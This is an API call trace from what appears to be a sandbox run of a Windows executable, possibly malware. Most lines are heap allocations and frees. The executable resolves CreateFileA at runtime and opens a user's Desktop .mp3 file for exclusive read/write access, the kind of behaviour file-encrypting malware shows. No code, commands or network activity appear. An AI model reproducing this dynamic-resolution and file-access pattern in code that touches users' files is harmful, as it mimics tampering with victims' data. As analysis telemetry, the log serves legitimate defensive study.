1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0165.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0165.038] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0165.038] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.038] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.038] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.038] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0165.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.039] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.040] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0165.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba120 [0165.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba120, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0165.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.046] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0165.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0165.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0165.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba120, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0165.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.046] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0165.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0165.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0165.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0165.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0165.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0165.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0165.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0165.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3b) returned 0x8db0a8 [0165.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", cchWideChar=59, lpMultiByteStr=0x8db0a8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3", lpUsedDefaultChar=0x0) returned 59 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0165.048] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ob o9klz7mpdb_fa.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0165.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0165.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0165.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0165.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0165.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x76) returned 0x8afe68 [0165.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=59, lpWideCharStr=0x8afe68, cchWideChar=59 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3") returned 59 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0165.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0165.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.052] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0165.052] HeapFree (in: 